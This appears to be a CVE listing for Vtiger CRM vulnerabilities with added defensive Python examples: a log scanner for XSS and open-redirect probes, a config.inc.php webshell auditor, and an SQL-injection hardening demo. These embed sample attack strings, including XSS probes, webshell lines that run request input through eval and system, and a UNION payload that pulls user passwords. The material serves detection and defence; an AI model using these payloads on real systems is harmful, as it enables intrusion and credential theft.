
CVSS: 5.4 | EPSS: 0% | CPEs: 1 | EXPL: 0

14 Oct 2024 — Vtiger CRM v8.2.0 has an HTML injection vulnerability in the module parameter. Authenticated users can inject arbitrary HTML. • https://okankurtulus.com.tr/2024/09/12/vtiger-crm-v8-2-0-html-injection-authenticated • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CVSS: 6.4 | EPSS: 0% | CPEs: 1 | EXPL: 0

29 Aug 2024 — An Open Redirect vulnerability in the page parameter of vTiger CRM v7.4.0 allows attackers to redirect users to a malicious site via a crafted URL. • http://vtiger.com

CVSS: 10.0 | EPSS: 0% | CPEs: 1 | EXPL: 0

29 Aug 2024 — A reflected cross-site scripting (XSS) vulnerability in the tag parameter of the index page of vTiger CRM 7.4.0 allows attackers to execute arbitrary script in the context of a user's browser by injecting a crafted payload. vTiger CRM version 7.4.0 suffers from multiple reflected cross-site scripting vulnerabilities. • http://vtiger.com • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CVSS: 10.0 | EPSS: 0% | CPEs: 1 | EXPL: 0

29 Aug 2024 — A reflected cross-site scripting (XSS) vulnerability in the parent parameter of the index page of vTiger CRM 7.4.0 allows attackers to execute arbitrary script in the context of a user's browser by injecting a crafted payload. vTiger CRM version 7.4.0 suffers from multiple reflected cross-site scripting vulnerabilities. • http://vtiger.com • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CVSS: 10.0 | EPSS: 0% | CPEs: 1 | EXPL: 0

29 Aug 2024 — A reflected cross-site scripting (XSS) vulnerability in the viewname parameter of the index page of vTiger CRM 7.4.0 allows attackers to execute arbitrary script in the context of a user's browser by injecting a crafted payload. vTiger CRM version 7.4.0 suffers from multiple reflected cross-site scripting vulnerabilities. • http://vtiger.com • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
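The three reflected XSS entries above, the open redirect in the page parameter and the HTML injection in the module parameter all share one shape: a value in a query-string parameter of the index page is echoed or acted on without neutralisation. A detection rule over web-server access logs is the quickest retroactive check for whether anyone has tried these. The following is an added example, not code from the listing or from the Vtiger project; it assumes a combined-format access log, assumes the index page is served as /index.php, and runs over constructed log lines.

```python
import re
import urllib.parse

# Request parameters named in the advisories above (module, page, tag, parent, viewname).
WATCHED_PARAMS = {"module", "page", "tag", "parent", "viewname"}

# Markup or script fragments after URL-decoding: tag openers, javascript: URLs,
# inline event handlers, and attribute/tag break-outs such as x">.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z!]|javascript\s*:|\bon[a-z]+\s*=|['\"]\s*>", re.I)

# Absolute or scheme-relative URL at the start of the value (open-redirect shape).
REDIRECT_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.I)

# Apache/nginx combined log format (assumption about the deployment's log format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """Undo repeated URL-encoding so %253C is seen as <, not as %3C."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(path: str) -> list[tuple[str, str]]:
    """Return (parameter, reason) findings for one request target."""
    parsed = urllib.parse.urlsplit(path)
    # The advisories concern the index page; assumption: it is served as /index.php or /.
    if parsed.path.rsplit("/", 1)[-1] not in ("", "index.php"):
        return []
    findings = []
    for name, values in urllib.parse.parse_qs(parsed.query, keep_blank_values=True).items():
        if name.lower() not in WATCHED_PARAMS:
            continue
        for raw in values:  # parse_qs decoded once; decode again for nested encoding
            value = decode_fully(raw)
            if MARKUP_RE.search(value):
                findings.append((name, "markup/script in parameter value"))
            if name.lower() == "page" and REDIRECT_RE.search(value):
                findings.append((name, "absolute URL in page parameter (open redirect)"))
    return findings


def scan_log(lines) -> list[dict]:
    """Run inspect_request over access-log lines; one record per finding."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for param, reason in inspect_request(m["path"]):
            hits.append({"ip": m["ip"], "ts": m["ts"], "status": m["status"],
                         "param": param, "reason": reason})
    return hits


# Constructed sample log lines (not real traffic): one benign request, two
# single-encoded XSS probes, one open-redirect probe, one double-encoded probe.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Aug/2024:10:15:02 +0000] "GET /index.php?module=Accounts&view=List HTTP/1.1" 200 5120
10.0.0.7 - - [29/Aug/2024:10:16:44 +0000] "GET /index.php?module=Home&tag=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 4711
10.0.0.7 - - [29/Aug/2024:10:17:01 +0000] "GET /index.php?module=Home&viewname=x%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1" 200 4711
10.0.0.9 - - [29/Aug/2024:10:18:30 +0000] "GET /index.php?page=//evil.example/login HTTP/1.1" 302 0
10.0.0.9 - - [29/Aug/2024:10:19:30 +0000] "GET /index.php?parent=%253Csvg%2520onload%253Dalert(1)%253E HTTP/1.1" 200 4711
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG.splitlines()):
        print(hit)
```

The decode loop matters: a single `unquote` would leave the double-encoded `parent` probe looking like harmless text. A 200 on an XSS probe does not prove reflection, only the attempt; confirm against the patched status of the instance before escalating.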

CVSS: 7.2 | EPSS: 0% | CPEs: 1 | EXPL: 0

16 Aug 2024 — VTiger CRM <= 8.1.0 does not properly sanitize user input before using it in a SQL statement, leading to a SQL Injection in the "CompanyDetails" operation of the "MailManager" module. • https://www.shielder.com/advisories/vtiger-mailmanager-sqli • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

CVSS: 8.3 | EPSS: 0% | CPEs: 1 | EXPL: 0

16 Aug 2024 — VTiger CRM <= 8.1.0 does not correctly check user privileges. A low-privileged user can interact directly with the "Migration" administrative module to disable arbitrary modules. • https://www.shielder.com/advisories/vtiger-migration-bac • CWE-269: Improper Privilege Management

CVSS: 8.1 | EPSS: 0% | CPEs: 1 | EXPL: 1

30 Apr 2024 — modules/Users/models/Module.php in Vtiger CRM 7.5.0 allows a remote authenticated attacker to run arbitrary PHP code, because an unprotected endpoint lets them write attacker-supplied code into the config.inc.php file, which is executed on every page load. • https://github.com/jselliott/CVE-2023-46304 • CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
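Because the payload in this entry lands in config.inc.php, a file that should contain nothing but settings, a post-incident check is to audit that file for anything other than plain assignments. The script below is an added example, not part of the listing or of Vtiger; it assumes config.inc.php consists of `$name = literal;` style lines (the sample file is constructed to resemble one, with three injected lines) and flags every line that is either a known dangerous construct or not a plain assignment. Legitimate lines that a given deployment carries beyond that shape need to be added to the allowlist rather than ignored.

```python
import re

# Building blocks for the "plain assignment" grammar: a quoted string (with
# backslash escapes), a PHP variable with optional string/integer indices.
_STR = r"'(?:[^'\\]|\\.)*'|\"(?:[^\"\\]|\\.)*\""
_VAR = r"\$[A-Za-z_]\w*(?:\[\s*(?:'[^']*'|\"[^\"]*\"|\d+)\s*\])*"
_TERM = rf"(?:{_STR}|-?\d+(?:\.\d+)?|true|false|null|{_VAR})"

# $var[...] = <literal or variable, optionally concatenated with '.'>;
ASSIGNMENT_RE = re.compile(rf"^\s*{_VAR}\s*=\s*{_TERM}(?:\s*\.\s*{_TERM})*\s*;\s*$", re.I)
# Lines that carry no statement at all: blank, PHP open/close tag, comment.
HARMLESS_RE = re.compile(r"^\s*(?:<\?php|\?>|//.*|#.*|/\*.*?\*/)?\s*$")
STRING_RE = re.compile(_STR)
TRAILING_COMMENT_RE = re.compile(r"(?://|#).*$")
# Constructs that have no business in a configuration file.
DANGEROUS_RE = re.compile(
    r"\b(?:eval|assert|system|exec|shell_exec|passthru|popen|proc_open|create_function|"
    r"base64_decode|gzinflate|gzuncompress|str_rot13|file_put_contents|"
    r"include|include_once|require|require_once)\b"
    r"|\$_(?:GET|POST|REQUEST|COOKIE|FILES|SERVER)\b|`",
    re.I,
)


def audit_config(text: str) -> list[tuple[int, str, str]]:
    """Return (line number, line, reason) for every line that is not a plain setting."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        # Drop string literals and trailing comments before looking for dangerous
        # tokens, so a password containing "eval" or a commented URL does not trigger.
        code_only = TRAILING_COMMENT_RE.sub("", STRING_RE.sub("''", line))
        if DANGEROUS_RE.search(code_only):
            findings.append((lineno, line, "dangerous construct"))
        elif HARMLESS_RE.match(line) or ASSIGNMENT_RE.match(line):
            continue
        else:
            findings.append((lineno, line, "not a plain assignment"))
    return findings


# Constructed sample modelled on the shape of a Vtiger config.inc.php (assumption:
# variable names chosen to look like Vtiger's, not copied from a real install).
# Lines 10, 14 and 15 are the injected ones.
SAMPLE_CONFIG = r"""<?php
// database and site settings
$dbconfig['db_server'] = 'localhost';
$dbconfig['db_port'] = ':3306';
$dbconfig['db_username'] = 'vtiger';
$dbconfig['db_password'] = 's3cret';
$dbconfig['db_name'] = 'vtigercrm';
$dbconfig['db_hostname'] = $dbconfig['db_server'].$dbconfig['db_port'];
$site_URL = 'https://crm.example.internal/';
$default_charset = 'UTF-8'; @eval($_REQUEST['k']);
$application_unique_key = '0123456789abcdef';
$upload_maxsize = 3145728;
$HELPDESK_SUPPORT_EMAIL_ID = 'support@example.internal';
if(isset($_GET['c'])){system($_GET['c']);}
$x = eval(base64_decode('ZWNobyAxOw=='));
"""

if __name__ == "__main__":
    for lineno, line, reason in audit_config(SAMPLE_CONFIG):
        print(f"line {lineno}: {reason}: {line}")
```

The check is line-based, so a multi-line array literal would be reported as "not a plain assignment"; that is the intended bias, since the cost of reviewing a false positive in a settings file is low and a webshell appended to an otherwise valid line (line 10 of the sample) is exactly what a hash-only comparison against a stale baseline would miss.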

CVSS: 9.0 | EPSS: 0% | CPEs: 1 | EXPL: 1

14 Sep 2023 — SQL injection vulnerability in Vtiger CRM v.7.5.0 allows a remote authenticated attacker to escalate privileges via the getQueryColumnsList function in ReportRun.php. • https://github.com/jselliott/CVE-2023-38891 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
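Both SQL injection entries on this page (the MailManager "CompanyDetails" operation and getQueryColumnsList in ReportRun.php) are cases where user-influenced text reaches a statement unneutralised. The function name in this entry points at a column list, which is the awkward case: identifiers cannot be bound as prepared-statement parameters, so the only defence is an allowlist plus identifier quoting. The example below is added here and is not Vtiger's code; it reproduces the bug class against a constructed sqlite schema whose table and column names merely resemble Vtiger's.

```python
import sqlite3

# Constructed schema (assumption): names chosen to resemble Vtiger tables, not its real schema.
SCHEMA = """
CREATE TABLE vtiger_account (accountid INTEGER, accountname TEXT, industry TEXT);
CREATE TABLE vtiger_users (id INTEGER, user_name TEXT, user_password TEXT);
INSERT INTO vtiger_account VALUES (1, 'Acme', 'Manufacturing'), (2, 'Globex', 'Energy');
INSERT INTO vtiger_users VALUES (1, 'admin', '$2y$10$constructed-hash');
"""

# Per-table allowlist of reportable columns (assumption: in a real deployment this
# would be derived from schema metadata, never from the request).
REPORTABLE_COLUMNS = {"vtiger_account": ("accountid", "accountname", "industry")}


def open_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def build_report_query_vulnerable(table: str, columns: list[str]) -> str:
    # Identifiers concatenated straight into the statement: the bug class of this entry.
    return "SELECT " + ", ".join(columns) + " FROM " + table


def quote_identifier(name: str) -> str:
    # ANSI double-quoting; an embedded " is doubled (sqlite, PostgreSQL, MySQL in ANSI_QUOTES mode).
    return '"' + name.replace('"', '""') + '"'


def build_report_query_hardened(table: str, columns: list[str]) -> str:
    # Reject anything outside the allowlist, then quote what survives as defence in depth.
    allowed = REPORTABLE_COLUMNS.get(table)
    if allowed is None:
        raise ValueError(f"table not reportable: {table!r}")
    for col in columns:
        if col not in allowed:
            raise ValueError(f"column not reportable: {col!r}")
    return ("SELECT " + ", ".join(quote_identifier(c) for c in columns)
            + " FROM " + quote_identifier(table))


def run_report(conn: sqlite3.Connection, builder, table: str, columns: list[str]) -> list[tuple]:
    return conn.execute(builder(table, columns)).fetchall()


# Attacker-chosen "column" that closes the SELECT and appends a UNION over the users
# table; the trailing -- comments out the original FROM clause.
INJECTED_COLUMNS = [
    "accountname",
    "industry FROM vtiger_account UNION SELECT user_name, user_password FROM vtiger_users --",
]


def demo() -> tuple[list[tuple], bool, list[tuple]]:
    """Return (rows leaked by the vulnerable builder, whether the hardened builder
    refused the payload, rows the hardened builder returns for a legitimate request)."""
    conn = open_db()
    leaked = run_report(conn, build_report_query_vulnerable, "vtiger_account", INJECTED_COLUMNS)
    try:
        run_report(conn, build_report_query_hardened, "vtiger_account", INJECTED_COLUMNS)
        blocked = False
    except ValueError:
        blocked = True
    legit = run_report(conn, build_report_query_hardened, "vtiger_account", ["accountname", "industry"])
    return leaked, blocked, legit


if __name__ == "__main__":
    leaked, blocked, legit = demo()
    print("vulnerable builder leaked:", leaked)
    print("hardened builder refused payload:", blocked)
    print("hardened builder, legitimate report:", legit)
```

Escaping the column names instead of allowlisting them would not help here: the payload contains no quote characters at all, so it passes any quote-escaping filter untouched. The allowlist is what blocks it.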

CVSS: 5.5 | EPSS: 0% | CPEs: 1 | EXPL: 1

27 Sep 2022 — Vtiger CRM v7.4.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the e-mail template modules. • https://code.vtiger.com/vtiger/vtigercrm • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')